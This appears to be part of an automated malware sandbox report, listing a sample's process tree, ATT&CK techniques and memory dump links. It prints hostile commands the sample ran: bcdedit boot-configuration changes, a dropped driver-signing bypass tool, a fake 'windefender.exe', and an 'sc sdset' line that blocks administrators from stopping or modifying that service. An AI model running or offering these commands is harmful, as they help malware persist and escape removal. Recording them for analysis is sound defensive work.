        Modifies boot configuration data using bcdedit
        
        PID:904
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set bootmenupolicy legacy
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:424
  - - C:\Windows\System32\bcdedit.exe
      C:\Windows\Sysnative\bcdedit.exe /v
      4⤵
      Modifies boot configuration data using bcdedit
      PID:3484
  - - C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
      C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
      4⤵
      Drops file in Drivers directory
      Executes dropped EXE
      PID:3756
  - - C:\Windows\windefender.exe
      "C:\Windows\windefender.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2060
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2548
      - C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2608

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:688

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2240

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

T1089

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/732-5-0x0000000003070000-0x0000000003071000-memory.dmp

Filesize
4KB

Download
memory/2064-14-0x00000000035B0000-0x00000000035B1000-memory.dmp

Filesize
4KB

Download
memory/3060-1-0x0000000003170000-0x0000000003171000-memory.dmp

Filesize
4KB

Download